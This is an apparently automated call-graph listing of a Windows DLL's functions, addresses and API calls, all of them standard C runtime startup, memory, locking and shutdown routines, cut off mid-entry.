6eb0d09c __dosmaperr 6 API calls 9781->9783 9802 6eb0b446 SetLastError 9781->9802 9784 6eb0d05d __dosmaperr 6 API calls 9782->9784 9785 6eb0b45e 9783->9785 9784->9781 9786 6eb0b8b2 __dosmaperr 12 API calls 9785->9786 9785->9802 9787 6eb0b46e 9786->9787 9789 6eb0b476 9787->9789 9790 6eb0b48d 9787->9790 9791 6eb0d09c __dosmaperr 6 API calls 9789->9791 9792 6eb0d09c __dosmaperr 6 API calls 9790->9792 9793 6eb0b484 9791->9793 9794 6eb0b499 9792->9794 9799 6eb0b90f _free 12 API calls 9793->9799 9795 6eb0b49d 9794->9795 9796 6eb0b4ae 9794->9796 9797 6eb0d09c __dosmaperr 6 API calls 9795->9797 9798 6eb0b0ce __dosmaperr 12 API calls 9796->9798 9797->9793 9800 6eb0b4b9 9798->9800 9799->9802 9801 6eb0b90f _free 12 API calls 9800->9801 9801->9802 10529 6eb05a10 10530 6eb05a40 10529->10530 10531 6eb05a64 10529->10531 10533 6eb05d90 36 API calls 10530->10533 10536 6eb05ed0 10531->10536 10535 6eb05a5a 10533->10535 10539 6eb06771 10536->10539 10544 6eb06705 10539->10544 10542 6eb07b0e std::_Xinvalid_argument RaiseException 10543 6eb06790 10542->10543 10545 6eb06660 std::exception::exception 25 API calls 10544->10545 10546 6eb06717 10545->10546 10546->10542 9758 6eb07062 9759 6eb07070 9758->9759 9760 6eb0706b 9758->9760 9764 6eb06f2c 9759->9764 9775 6eb07445 9760->9775 9766 6eb06f38 CallCatchBlock 9764->9766 9765 6eb06f61 dllmain_raw 9767 6eb06f7b dllmain_crt_dispatch 9765->9767 9772 6eb06f47 9765->9772 9766->9765 9768 6eb06f5c __DllMainCRTStartup@12 9766->9768 9766->9772 9767->9768 9767->9772 9769 6eb06fcd 9768->9769 9773 6eb06e7a __DllMainCRTStartup@12 84 API calls 9768->9773 9770 6eb06fd6 dllmain_crt_dispatch 9769->9770 9769->9772 9771 6eb06fe9 dllmain_raw 9770->9771 9770->9772 9771->9772 9774 6eb06fc2 dllmain_raw 9773->9774 9774->9769 9776 6eb0745b 9775->9776 9778 6eb07464 9776->9778 9779 6eb073f8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9776->9779 9778->9759 9779->9778 8970 6eb06d20 8971 6eb06d2b 8970->8971 8972 6eb06d5e 8970->8972 8974 6eb06d50 8971->8974 8975 6eb06d30 8971->8975 9009 6eb06e7a 8972->9009 8982 6eb06d73 8974->8982 8976 6eb06d35 8975->8976 8977 6eb06d46 8975->8977 8981 6eb06d3a 8976->8981 8996 6eb068ce 8976->8996 9001 6eb068af 8977->9001 8983 6eb06d7f CallCatchBlock 8982->8983 9032 6eb0693f 8983->9032 8985 6eb06d86 __DllMainCRTStartup@12 8986 6eb06e72 8985->8986 8987 6eb06dad 8985->8987 8993 6eb06de9 ___scrt_is_nonwritable_in_current_image CallCatchBlock 8985->8993 9051 6eb07288 IsProcessorFeaturePresent 8986->9051 9043 6eb068a1 8987->9043 8990 6eb06e79 8991 6eb06dbc __RTC_Initialize 8991->8993 9046 6eb07490 InitializeSListHead 8991->9046 8993->8981 8994 6eb06dca 8994->8993 9047 6eb06876 8994->9047 9310 6eb0acea 8996->9310 9516 6eb07b99 9001->9516 9006 6eb068cb 9006->8981 9007 6eb07ba4 21 API calls 9008 6eb068b8 9007->9008 9008->8981 9010 6eb06e86 CallCatchBlock __DllMainCRTStartup@12 9009->9010 9011 6eb06f22 9010->9011 9012 6eb06eb7 9010->9012 9024 6eb06e8f 9010->9024 9013 6eb07288 __DllMainCRTStartup@12 4 API calls 9011->9013 9536 6eb0690f 9012->9536 9019 6eb06f29 CallCatchBlock 9013->9019 9015 6eb06ebc 9545 6eb0749c 9015->9545 9017 6eb06ec1 __RTC_Initialize __DllMainCRTStartup@12 9548 6eb06ab0 9017->9548 9018 6eb06f61 dllmain_raw 9020 6eb06f7b dllmain_crt_dispatch 9018->9020 9029 6eb06f47 9018->9029 9019->9018 9027 6eb06f5c __DllMainCRTStartup@12 9019->9027 9019->9029 9020->9027 9020->9029 9024->8981 9025 6eb06fcd 9026 6eb06fd6 dllmain_crt_dispatch 9025->9026 9025->9029 9028 6eb06fe9 dllmain_raw 9026->9028 9026->9029 9027->9025 9030 6eb06e7a __DllMainCRTStartup@12 79 API calls 9027->9030 9028->9029 9029->8981 9031 6eb06fc2 dllmain_raw 9030->9031 9031->9025 9033 6eb06948 9032->9033 9055 6eb070a7 IsProcessorFeaturePresent 9033->9055 9037 6eb06959 9038 6eb0695d 9037->9038 9065 6eb0accd 9037->9065 9038->8985 9041 6eb06974 9041->8985 9304 6eb06978 9043->9304 9045 6eb068a8 9045->8991 9046->8994 9048 6eb0687b ___scrt_release_startup_lock 9047->9048 9049 6eb070a7 IsProcessorFeaturePresent 9048->9049 9050 6eb06884 9048->9050 9049->9050 9050->8993 9052 6eb0729e CallCatchBlock 9051->9052 9053 6eb07349 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9052->9053 9054 6eb07394 CallCatchBlock 9053->9054 9054->8990 9056 6eb06954 9055->9056 9057 6eb07b7a 9056->9057 9074 6eb08e1c 9057->9074 9061 6eb07b8b 9062 6eb07b96 9061->9062 9088 6eb08e58 9061->9088 9062->9037 9064 6eb07b83 9064->9037 9130 6eb0d429 9065->9130 9068 6eb07baf 9069 6eb07bc2 9068->9069 9070 6eb07bb8 9068->9070 9069->9038 9071 6eb0804e ___vcrt_uninitialize_ptd 6 API calls 9070->9071 9072 6eb07bbd 9071->9072 9073 6eb08e58 ___vcrt_uninitialize_locks DeleteCriticalSection 9072->9073 9073->9069 9075 6eb08e25 9074->9075 9077 6eb08e4e 9075->9077 9078 6eb07b7f 9075->9078 9092 6eb091c9 9075->9092 9079 6eb08e58 ___vcrt_uninitialize_locks DeleteCriticalSection 9077->9079 9078->9064 9080 6eb0801b 9078->9080 9079->9078 9111 6eb090da 9080->9111 9083 6eb08030 9083->9061 9086 6eb0804b 9086->9061 9089 6eb08e82 9088->9089 9090 6eb08e63 9088->9090 9089->9064 9091 6eb08e6d DeleteCriticalSection 9090->9091 9091->9089 9091->9091 9097 6eb09091 9092->9097 9095 6eb09201 InitializeCriticalSectionAndSpinCount 9096 6eb091ec 9095->9096 9096->9075 9098 6eb090a9 9097->9098 9102 6eb090cc 9097->9102 9098->9102 9103 6eb08ff7 9098->9103 9101 6eb090be GetProcAddress 9101->9102 9102->9095 9102->9096 9109 6eb09003 ___vcrt_FlsGetValue 9103->9109 9104 6eb09077 9104->9101 9104->9102 9105 6eb09019 LoadLibraryExW 9106 6eb09037 GetLastError 9105->9106 9107 6eb0907e 9105->9107 9106->9109 9107->9104 9108 6eb09086 FreeLibrary 9107->9108 9108->9104 9109->9104 9109->9105 9110 6eb09059 LoadLibraryExW 9109->9110 9110->9107 9110->9109 9112 6eb09091 ___vcrt_FlsGetValue 5 API calls 9111->9112 9113 6eb090f4 9112->9113 9114 6eb0910d TlsAlloc 9113->9114 9115 6eb08025 9113->9115 9115->9083 9116 6eb0918b 9115->9116 9117 6eb09091 ___vcrt_FlsGetValue 5 API calls 9116->9117 9118 6eb091a5 9117->9118 9119 6eb091c0 TlsSetValue 9118->9119 9120 6eb0803e 9118->9120 9119->9120 9120->9086 9121 6eb0804e 9120->9121 9122 6eb08058 9121->9122 9124 6eb0805e 9121->9124 9125 6eb09115 9122->9125 9124->9083 9126 6eb09091 ___vcrt_FlsGetValue 5 API calls 9125->9126 9127 6eb0912f 9126->9127 9128 6eb09147 TlsFree 9127->9128 9129 6eb0913b 9127->9129 9128->9129 9129->9124 9131 6eb0d439 9130->9131 9132 6eb06966 9130->9132 9131->9132 9134 6eb0d39d 9131->9134 9132->9041 9132->9068 9135 6eb0d3a9 CallCatchBlock 9134->9135 9146 6eb0b7d4 EnterCriticalSection 9135->9146 9137 6eb0d3b0 9147 6eb0ef5e 9137->9147 9145 6eb0d3ce 9171 6eb0d3f4 9145->9171 9146->9137 9148 6eb0ef6a CallCatchBlock 9147->9148 9149 6eb0ef73 9148->9149 9150 6eb0ef94 9148->9150 9182 6eb0b686 9149->9182 9174 6eb0b7d4 EnterCriticalSection 9150->9174 9153 6eb0efa0 9159 6eb0efcc 9153->9159 9175 6eb0eeae 9153->9175 9158 6eb0d3bf 9158->9145 9160 6eb0d233 GetStartupInfoW 9158->9160 9188 6eb0eff3 9159->9188 9161 6eb0d250 9160->9161 9162 6eb0d2e4 9160->9162 9161->9162 9163 6eb0ef5e 26 API calls 9161->9163 9166 6eb0d2e9 9162->9166 9164 6eb0d278 9163->9164 9164->9162 9165 6eb0d2a8 GetFileType 9164->9165 9165->9164 9167 6eb0d2f0 9166->9167 9168 6eb0d333 GetStdHandle 9167->9168 9169 6eb0d399 9167->9169 9170 6eb0d346 GetFileType 9167->9170 9168->9167 9169->9145 9170->9167 9303 6eb0b81c LeaveCriticalSection 9171->9303 9173 6eb0d3df 9173->9131 9174->9153 9191 6eb0b8b2 9175->9191 9177 6eb0eecd 9203 6eb0b90f 9177->9203 9178 6eb0eec0 9178->9177 9198 6eb0d0de 9178->9198 9180 6eb0ef22 9180->9153 9232 6eb0b423 GetLastError 9182->9232 9184 6eb0b68b 9185 6eb099cc 9184->9185 9284 6eb09968 9185->9284 9187 6eb099d8 9187->9158 9302 6eb0b81c LeaveCriticalSection 9188->9302 9190 6eb0effa 9190->9158 9197 6eb0b8bf __dosmaperr 9191->9197 9192 6eb0b8ff 9195 6eb0b686 _free 13 API calls 9192->9195 9193 6eb0b8ea RtlAllocateHeap 9194 6eb0b8fd 9193->9194 9193->9197 9194->9178 9195->9194 9197->9192 9197->9193 9209 6eb09eaa 9197->9209 9218 6eb0cefd 9198->9218 9201 6eb0d118 InitializeCriticalSectionAndSpinCount 9202 6eb0d103 9201->9202 9202->9178 9204 6eb0b91a HeapFree 9203->9204 9208 6eb0b943 _free 9203->9208 9205 6eb0b92f 9204->9205 9204->9208 9206 6eb0b686 _free 12 API calls 9205->9206 9207 6eb0b935 GetLastError 9206->9207 9207->9208 9208->9180 9212 6eb09ed7 9209->9212 9213 6eb09ee3 CallCatchBlock 9212->9213 9214 6eb0b7d4 CallCatchBlock EnterCriticalSection 9213->9214 9215 6eb09eee 9214->9215 9216 6eb09f2a __dosmaperr LeaveCriticalSection 9215->9216 9217 6eb09eb5 9216->9217 9217->9197 9219 6eb0cf27 9218->9219 9220 6eb0cf2b 9218->9220 9219->9201 9219->9202 9220->9219 9225 6eb0ce36 9220->9225 9223 6eb0cf45 GetProcAddress 9223->9219 9224 6eb0cf55 __dosmaperr 9223->9224 9224->9219 9230 6eb0ce47 ___vcrt_FlsGetValue 9225->9230 9226 6eb0ce65 LoadLibraryExW 9228 6eb0ce80 GetLastError 9226->9228 9226->9230 9227 6eb0cef2 9227->9219 9227->9223 9228->9230 9229 6eb0cedb FreeLibrary 9229->9230 9230->9226 9230->9227 9230->9229 9231 6eb0ceb3 LoadLibraryExW 9230->9231 9231->9230 9233 6eb0b440 9232->9233 9234 6eb0b43a 9232->9234 9254 6eb0b446 SetLastError 9233->9254 9255 6eb0d09c 9233->9255 9260 6eb0d05d 9234->9260 9238 6eb0b8b2 __dosmaperr 12 API calls 9239 6eb0b46e 9238->9239 9241 6eb0b476 9239->9241 9242 6eb0b48d 9239->9242 9243 6eb0d09c __dosmaperr 6 API calls 9241->9243 9244 6eb0d09c __dosmaperr 6 API calls 9242->9244 9245 6eb0b484 9243->9245 9246 6eb0b499 9244->9246 9251 6eb0b90f _free 12 API calls 9245->9251 9247 6eb0b49d 9246->9247 9248 6eb0b4ae 9246->9248 9249 6eb0d09c __dosmaperr 6 API calls 9247->9249 9265 6eb0b0ce 9248->9265 9249->9245 9251->9254 9253 6eb0b90f _free 12 API calls 9253->9254 9254->9184 9256 6eb0cefd __dosmaperr 5 API calls 9255->9256 9257 6eb0d0b8 9256->9257 9258 6eb0b45e 9257->9258 9259 6eb0d0d6 TlsSetValue 9257->9259 9258->9238 9258->9254 9261 6eb0cefd __dosmaperr 5 API calls 9260->9261 9262 6eb0d079 9261->9262 9263 6eb0d082 9262->9263 9264 6eb0d094 TlsGetValue 9262->9264 9263->9233 9270 6eb0af62 9265->9270 9271 6eb0af6e CallCatchBlock 9270->9271 9272 6eb0b7d4 CallCatchBlock EnterCriticalSection 9271->9272 9273 6eb0af78 9272->9273 9274 6eb0afa8 __dosmaperr LeaveCriticalSection 9273->9274 9275 6eb0af96 9274->9275 9276 6eb0b074 9275->9276 9277 6eb0b080 CallCatchBlock 9276->9277 9278 6eb0b7d4 CallCatchBlock EnterCriticalSection 9277->9278 9279 6eb0b08a 9278->9279 9280 6eb0b255 __dosmaperr 14 API calls 9279->9280 9281 6eb0b0a2 9280->9281 9282 6eb0b0c2 __dosmaperr LeaveCriticalSection 9281->9282 9283 6eb0b0b0 9282->9283 9283->9253 9285 6eb0b423 __dosmaperr 14 API calls 9284->9285 9286 6eb09973 9285->9286 9287 6eb09981 9286->9287 9292 6eb099f9 IsProcessorFeaturePresent 9286->9292 9287->9187 9289 6eb099cb 9290 6eb09968 ___std_exception_copy 25 API calls 9289->9290 9291 6eb099d8 9290->9291 9291->9187 9293 6eb09a05 9292->9293 9296 6eb09820 9293->9296 9297 6eb0983c CallCatchBlock 9296->9297 9298 6eb09868 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9297->9298 9301 6eb09939 CallCatchBlock 9298->9301 9299 6eb06791 __ehhandler$___std_fs_get_file_id@8 5 API calls 9300 6eb09957 GetCurrentProcess TerminateProcess 9299->9300 9300->9289 9301->9299 9302->9190 9303->9173 9305 6eb06984 9304->9305 9306 6eb06988 9304->9306 9305->9045 9307 6eb07288 __DllMainCRTStartup@12 4 API calls 9306->9307 9309 6eb06995 ___scrt_release_startup_lock 9306->9309 9308 6eb069fe 9307->9308 9309->9045 9316 6eb0b2a0 9310->9316 9313 6eb07ba4 9496 6eb07f45 9313->9496 9317 6eb0b2aa 9316->9317 9318 6eb068d3 9316->9318 9319 6eb0d05d __dosmaperr 6 API calls 9317->9319 9318->9313 9320 6eb0b2b1 9319->9320 9320->9318 9321 6eb0d09c __dosmaperr 6 API calls 9320->9321 9322 6eb0b2c4 9321->9322 9324 6eb0b167 9322->9324 9325 6eb0b172 9324->9325 9329 6eb0b182 9324->9329 9330 6eb0b188 9325->9330 9328 6eb0b90f _free 14 API calls 9328->9329 9329->9318 9331 6eb0b1a3 9330->9331 9332 6eb0b19d 9330->9332 9334 6eb0b90f _free 14 API calls 9331->9334 9333 6eb0b90f _free 14 API calls 9332->9333 9333->9331 9335 6eb0b1af 9334->9335 9336 6eb0b90f _free 14 API calls 9335->9336 9337 6eb0b1ba 9336->9337 9338 6eb0b90f _free 14 API calls 9337->9338 9339 6eb0b1c5 9338->9339 9340 6eb0b90f _free 14 API calls 9339->9340 9341 6eb0b1d0 9340->9341 9342 6eb0b90f _free 14 API calls 9341->9342 9343 6eb0b1db 9342->9343 9344 6eb0b90f _free 14 API calls 9343->9344 9345 6eb0b1e6 9344->9345 9346 6eb0b90f _free 14 API calls 9345->9346 9347 6eb0b1f1 9346->9347 9348 6eb0b90f _free 14 API calls 9347->9348 9349 6eb0b1fc 9348->9349 9350 6eb0b90f _free 14 API calls 9349->9350 9351 6eb0b20a 9350->9351 9356 6eb0afb4 9351->9356 9357 6eb0afc0 CallCatchBlock 9356->9357 9372 6eb0b7d4 EnterCriticalSection 9357->9372 9359 6eb0aff4 9373 6eb0b013 9359->9373 9361 6eb0afca 9361->9359 9363 6eb0b90f _free 14 API calls 9361->9363 9363->9359 9364 6eb0b01f 9365 6eb0b02b CallCatchBlock 9364->9365 9377 6eb0b7d4 EnterCriticalSection 9365->9377 9367 6eb0b035 9378 6eb0b255 9367->9378 9369 6eb0b048 9382 6eb0b068 9369->9382 9372->9361 9376 6eb0b81c LeaveCriticalSection 9373->9376 9375 6eb0b001 9375->9364 9376->9375 9377->9367 9379 6eb0b28b __dosmaperr 9378->9379 9380 6eb0b264 __dosmaperr 9378->9380 9379->9369 9380->9379 9385 6eb0ddf0 9380->9385 9495 6eb0b81c LeaveCriticalSection 9382->9495 9384 6eb0b056 9384->9328 9387 6eb0de70 9385->9387 9389 6eb0de06 9385->9389 9388 6eb0b90f _free 14 API calls 9387->9388 9411 6eb0debe 9387->9411 9390 6eb0de92 9388->9390 9389->9387 9391 6eb0de39 9389->9391 9395 6eb0b90f _free 14 API calls 9389->9395 9392 6eb0b90f _free 14 API calls 9390->9392 9397 6eb0b90f _free 14 API calls 9391->9397 9412 6eb0de5b 9391->9412 9393 6eb0dea5 9392->9393 9396 6eb0b90f _free 14 API calls 9393->9396 9394 6eb0b90f _free 14 API calls 9398 6eb0de65 9394->9398 9400 6eb0de2e 9395->9400 9402 6eb0deb3 9396->9402 9403 6eb0de50 9397->9403 9404 6eb0b90f _free 14 API calls 9398->9404 9399 6eb0df2c 9405 6eb0b90f _free 14 API calls 9399->9405 9413 6eb0e230 9400->9413 9401 6eb0decc 9401->9399 9409 6eb0b90f 14 API calls _free 9401->9409 9407 6eb0b90f _free 14 API calls 9402->9407 9441 6eb0e32e 9403->9441 9404->9387 9410 6eb0df32 9405->9410 9407->9411 9409->9401 9410->9379 9453 6eb0df61 9411->9453 9412->9394 9414 6eb0e241 9413->9414 9440 6eb0e32a 9413->9440 9415 6eb0e252 9414->9415 9417 6eb0b90f _free 14 API calls 9414->9417 9416 6eb0e264 9415->9416 9418 6eb0b90f _free 14 API calls 9415->9418 9419 6eb0e276 9416->9419 9420 6eb0b90f _free 14 API calls 9416->9420 9417->9415 9418->9416 9421 6eb0e288 9419->9421 9422 6eb0b90f _free 14 API calls 9419->9422 9420->9419 9423 6eb0e29a 9421->9423 9425 6eb0b90f _free 14 API calls 9421->9425 9422->9421 9424 6eb0e2ac 9423->9424 9426 6eb0b90f _free 14 API calls 9423->9426 9427 6eb0e2be 9424->9427 9428 6eb0b90f _free 14 API calls 9424->9428 9425->9423 9426->9424 9429 6eb0e2d0 9427->9429 9430 6eb0b90f _free 14 API calls 9427->9430 9428->9427 9431 6eb0e2e2 9429->9431 9433 6eb0b90f _free 14 API calls 9429->9433 9430->9429 9432 6eb0e2f4 9431->9432 9434 6eb0b90f _free 14 API calls 9431->9434 9435 6eb0b90f _free 14 API calls 9432->9435 9437 6eb0e306 9432->9437 9433->9431 9434->9432 9435->9437 9436 6eb0e318 9439 6eb0b90f _free 14 API calls 9436->9439 9436->9440 9437->9436 9438 6eb0b90f _free 14 API calls 9437->9438 9438->9436 9439->9440 9440->9391 9442 6eb0e33b 9441->9442 9452 6eb0e393 9441->9452 9443 6eb0b90f _free 14 API calls 9442->9443 9444 6eb0e34b 9442->9444 9443->9444 9445 6eb0e35d 9444->9445 9446 6eb0b90f _free 14 API calls 9444->9446 9447 6eb0e36f 9445->9447 9448 6eb0b90f _free 14 API calls 9445->9448 9446->9445 9449 6eb0e381 9447->9449 9450 6eb0b90f _free 14 API calls 9447->9450 9448->9447 9451 6eb0b90f _free 14 API calls 9449->9451 9449->9452 9450->9449 9451->9452 9452->9412 9454 6eb0df6e 9453->9454 9458 6eb0df8d 9453->9458 9454->9458 9459 6eb0e3cf 9454->9459 9457 6eb0b90f _free 14 API calls 9457->9458 9458->9401 9460 6eb0df87 9459->9460 9461 6eb0e3e0 9459->9461 9460->9457 9462 6eb0e397 __dosmaperr 14 API calls 9461->9462 9463 6eb0e3e8 9462->9463 9464 6eb0e397 __dosmaperr 14 API calls 9463->9464 9465 6eb0e3f3 9464->9465 9466 6eb0e397 __dosmaperr 14 API calls 9465->9466 9467 6eb0e3fe 9466->9467 9468 6eb0e397 __dosmaperr 14 API calls 9467->9468 9469 6eb0e409 9468->9469 9470 6eb0e397 __dosmaperr 14 API calls 9469->9470 9471 6eb0e417 9470->9471 9472 6eb0b90f _free 14 API calls 9471->9472 9473 6eb0e422 9472->9473 9474 6eb0b90f _free 14 API calls 9473->9474 9475 6eb0e42d 9474->9475 9476 6eb0b90f _free 14 API calls 9475->9476 9477 6eb0e438 9476->9477 9478 6eb0e397 __dosmaperr 14 API calls 9477->9478 9479 6eb0e446 9478->9479 9480 6eb0e397 __dosmaperr 14 API calls 9479->9480 9481 6eb0e454 9480->9481 9482 6eb0e397 __dosmaperr 14 API calls 9481->9482 9483 6eb0e465 9482->9483 9484 6eb0e397 __dosmaperr 14 API calls 9483->9484 9485 6eb0e473 9484->9485 9486 6eb0e397 __dosmaperr 14 API calls 9485->9486 9487 6eb0e481 9486->9487 9488 6eb0b90f _free 14 API calls 9487->9488 9489 6eb0e48c 9488->9489 9490 6eb0b90f _free 14 API calls 9489->9490 9491 6eb0e497 9490->9491 9492 6eb0b90f _free 14 API calls 9491->9492 9493 6eb0e4a2 9492->9493 9494 6eb0b90f _free 14 API calls 9493->9494 9494->9460 9495->9384 9497 6eb07f52 9496->9497 9503 6eb068d8 9496->9503 9498 6eb07f60 9497->9498 9504 6eb09150 9497->9504 9500 6eb0918b ___vcrt_FlsSetValue 6 API calls 9498->9500 9501 6eb07f70 9500->9501 9509 6eb07f29 9501->9509 9503->8981 9505 6eb09091 ___vcrt_FlsGetValue 5 API calls 9504->9505 9506 6eb0916a 9505->9506 9507 6eb09182 TlsGetValue 9506->9507 9508 6eb09176 9506->9508 9507->9508 9508->9498 9510 6eb07f40 9509->9510 9511 6eb07f33 9509->9511 9510->9503 9511->9510 9513 6eb0ada7 9511->9513 9514 6eb0b90f _free 14 API calls 9513->9514 9515 6eb0adbf 9514->9515 9515->9510 9522 6eb07f89 9516->9522 9518 6eb068b4 9518->9008 9519 6eb0acdf 9518->9519 9520 6eb0b423 __dosmaperr 14 API calls 9519->9520 9521 6eb068c0 9520->9521 9521->9006 9521->9007 9523 6eb07f92 9522->9523 9524 6eb07f95 GetLastError 9522->9524 9523->9518 9525 6eb09150 ___vcrt_FlsGetValue 6 API calls 9524->9525 9526 6eb07faa 9525->9526 9527 6eb07fc9 9526->9527 9528 6eb0800f SetLastError 9526->9528 9529 6eb0918b ___vcrt_FlsSetValue 6 API calls 9526->9529 9527->9528 9528->9518 9530 6eb07fc3 CallCatchBlock 9529->9530 9530->9527 9531 6eb07feb 9530->9531 9532 6eb0918b ___vcrt_FlsSetValue 6 API calls 9530->9532 9533 6eb0918b ___vcrt_FlsSetValue 6 API calls 9531->9533 9534 6eb07fff 9531->9534 9532->9531 9533->9534 9535 6eb0ada7 ___std_exception_copy 14 API calls 9534->9535 9535->9527 9537 6eb06914 ___scrt_release_startup_lock 9536->9537 9538 6eb06918 9537->9538 9542 6eb06924 __DllMainCRTStartup@12 9537->9542 9557 6eb0ab46 9538->9557 9541 6eb06931 9541->9015 9542->9541 9560 6eb0a1f0 9542->9560 9627 6eb07f06 InterlockedFlushSList 9545->9627 9549 6eb06abc 9548->9549 9553 6eb06ad2 9549->9553 9631 6eb0acf2 9549->9631 9551 6eb06aca 9552 6eb07baf ___scrt_uninitialize_crt 7 API calls 9551->9552 9552->9553 9554 6eb06f1c 9553->9554 9741 6eb06932 9554->9741 9571 6eb0a858 9557->9571 9561 6eb0a20f 9560->9561 9562 6eb0a1fe 9560->9562 9595 6eb0a0b6 9561->9595 9588 6eb0a296 GetModuleHandleW 9562->9588 9567 6eb0a249 9567->9015 9572 6eb0a864 CallCatchBlock 9571->9572 9579 6eb0b7d4 EnterCriticalSection 9572->9579 9574 6eb0a872 9580 6eb0aa56 9574->9580 9579->9574 9581 6eb0a87f 9580->9581 9582 6eb0aa75 9580->9582 9584 6eb0a8a7 9581->9584 9582->9581 9583 6eb0b90f _free 14 API calls 9582->9583 9583->9581 9587 6eb0b81c LeaveCriticalSection 9584->9587 9586 6eb06922 9586->9015 9587->9586 9589 6eb0a203 9588->9589 9589->9561 9590 6eb0a2d9 GetModuleHandleExW 9589->9590 9591 6eb0a2f8 GetProcAddress 9590->9591 9592 6eb0a30d 9590->9592 9591->9592 9593 6eb0a321 FreeLibrary 9592->9593 9594 6eb0a32a 9592->9594 9593->9594 9594->9561 9596 6eb0a0c2 CallCatchBlock 9595->9596 9611 6eb0b7d4 EnterCriticalSection 9596->9611 9598 6eb0a0cc 9612 6eb0a103 9598->9612 9600 6eb0a0d9 9616 6eb0a0f7 9600->9616 9603 6eb0a254 9620 6eb0b881 GetPEB 9603->9620 9606 6eb0a283 9609 6eb0a2d9 CallCatchBlock 3 API calls 9606->9609 9607 6eb0a263 GetPEB 9607->9606 9608 6eb0a273 GetCurrentProcess TerminateProcess 9607->9608 9608->9606 9610 6eb0a28b ExitProcess 9609->9610 9611->9598 9613 6eb0a10f CallCatchBlock 9612->9613 9614 6eb0a170 CallCatchBlock 9613->9614 9615 6eb0ab46 __DllMainCRTStartup@12 14 API calls 9613->9615 9614->9600 9615->9614 9619 6eb0b81c LeaveCriticalSection 9616->9619 9618 6eb0a0e5 9618->9567 9618->9603 9619->9618 9621 6eb0a25e 9620->9621 9622 6eb0b89b 9620->9622 9621->9606 9621->9607 9624 6eb0cf80 9622->9624 9625 6eb0cefd __dosmaperr 5 API calls 9624->9625 9626 6eb0cf9c 9625->9626 9626->9621 9628 6eb07f16 9627->9628 9629 6eb074a6 9627->9629 9628->9629 9630 6eb0ada7 ___std_exception_copy 14 API calls 9628->9630 9629->9017 9630->9628 9632 6eb0acfd 9631->9632 9633 6eb0ad0f ___scrt_uninitialize_crt 9631->9633 9634 6eb0ad0b 9632->9634 9636 6eb0daab 9632->9636 9633->9551 9634->9551 9639 6eb0d959 9636->9639 9642 6eb0d8ad 9639->9642 9643 6eb0d8b9 CallCatchBlock 9642->9643 9650 6eb0b7d4 EnterCriticalSection 9643->9650 9645 6eb0d8c3 ___scrt_uninitialize_crt 9646 6eb0d92f 9645->9646 9651 6eb0d821 9645->9651 9659 6eb0d94d 9646->9659 9650->9645 9652 6eb0d82d CallCatchBlock 9651->9652 9662 6eb0dbc8 EnterCriticalSection 9652->9662 9654 6eb0d837 ___scrt_uninitialize_crt 9658 6eb0d870 9654->9658 9663 6eb0da63 9654->9663 9673 6eb0d8a1 9658->9673 9740 6eb0b81c LeaveCriticalSection 9659->9740 9661 6eb0d93b 9661->9634 9662->9654 9664 6eb0da70 9663->9664 9665 6eb0da79 9663->9665 9667 6eb0d959 ___scrt_uninitialize_crt 66 API calls 9664->9667 9676 6eb0d9fe 9665->9676 9672 6eb0da76 9667->9672 9670 6eb0da95 9689 6eb0f1df 9670->9689 9672->9658 9739 6eb0dbdc LeaveCriticalSection 9673->9739 9675 6eb0d88f 9675->9645 9677 6eb0da16 9676->9677 9681 6eb0da3b 9676->9681 9678 6eb0dd4c ___scrt_uninitialize_crt 25 API calls 9677->9678 9677->9681 9679 6eb0da34 9678->9679 9700 6eb0f9d7 9679->9700 9681->9672 9682 6eb0dd4c 9681->9682 9683 6eb0dd58 9682->9683 9684 6eb0dd6d 9682->9684 9685 6eb0b686 _free 14 API calls 9683->9685 9684->9670 9686 6eb0dd5d 9685->9686 9687 6eb099cc ___std_exception_copy 25 API calls 9686->9687 9688 6eb0dd68 9687->9688 9688->9670 9690 6eb0f1f0 9689->9690 9691 6eb0f1fd 9689->9691 9692 6eb0b686 _free 14 API calls 9690->9692 9693 6eb0f246 9691->9693 9695 6eb0f224 9691->9695 9699 6eb0f1f5 9692->9699 9694 6eb0b686 _free 14 API calls 9693->9694 9696 6eb0f24b 9694->9696 9725 6eb0f13d 9695->9725 9698 6eb099cc ___std_exception_copy 25 API calls 9696->9698 9698->9699 9699->9672 9701 6eb0f9e3 CallCatchBlock 9700->9701 9702 6eb0fa03 9701->9702 9703 6eb0f9eb 9701->9703 9705 6eb0fa9e 9702->9705 9709 6eb0fa35 9702->9709 9704 6eb0b673 __dosmaperr 14 API calls 9703->9704 9706 6eb0f9f0 9704->9706 9707 6eb0b673 __dosmaperr 14 API calls 9705->9707 9708 6eb0b686 _free 14 API calls 9706->9708 9710 6eb0faa3 9707->9710 9711 6eb0f9f8 9708->9711 9712 6eb0effc ___scrt_uninitialize_crt EnterCriticalSection 9709->9712 9713 6eb0b686 _free 14 API calls 9710->9713 9711->9681 9714 6eb0fa3b 9712->9714 9715 6eb0faab 9713->9715 9716 6eb0fa57 9714->9716 9717 6eb0fa6c 9714->9717 9718 6eb099cc ___std_exception_copy 25 API calls 9715->9718 9719 6eb0b686 _free 14 API calls 9716->9719 9720 6eb0fac9 ___scrt_uninitialize_crt 60 API calls 9717->9720 9718->9711 9721 6eb0fa5c 9719->9721 9723 6eb0fa67 9720->9723 9722 6eb0b673 __dosmaperr 14 API calls 9721->9722 9722->9723 9724 6eb0fa96 ___scrt_uninitialize_crt LeaveCriticalSection 9723->9724 9724->9711 9726 6eb0f149 CallCatchBlock 9725->9726 9727 6eb0effc ___scrt_uninitialize_crt EnterCriticalSection 9726->9727 9728 6eb0f158 9727->9728 9729 6eb0f19f 9728->9729 9730 6eb0f0d3 ___scrt_uninitialize_crt 25 API calls 9728->9730 9731 6eb0b686 _free 14 API calls 9729->9731 9732 6eb0f184 FlushFileBuffers 9730->9732 9733 6eb0f1a4 9731->9733 9732->9733 9734 6eb0f190 9732->9734 9735 6eb0f1d3 ___scrt_uninitialize_crt LeaveCriticalSection 9733->9735 9736 6eb0b673 __dosmaperr 14 API calls 9734->9736 9737 6eb0f1bc 9735->9737 9738 6eb0f195 GetLastError 9736->9738 9737->9699 9738->9729 9739->9675 9740->9661 9746 6eb0ad22 9741->9746 9744 6eb0804e ___vcrt_uninitialize_ptd 6 API calls 9745 6eb06f21 9744->9745 9745->9024 9749 6eb0b504 9746->9749 9750 6eb06939 9749->9750 9751 6eb0b50e 9749->9751 9750->9744 9753 6eb0d01e 9751->9753 9754 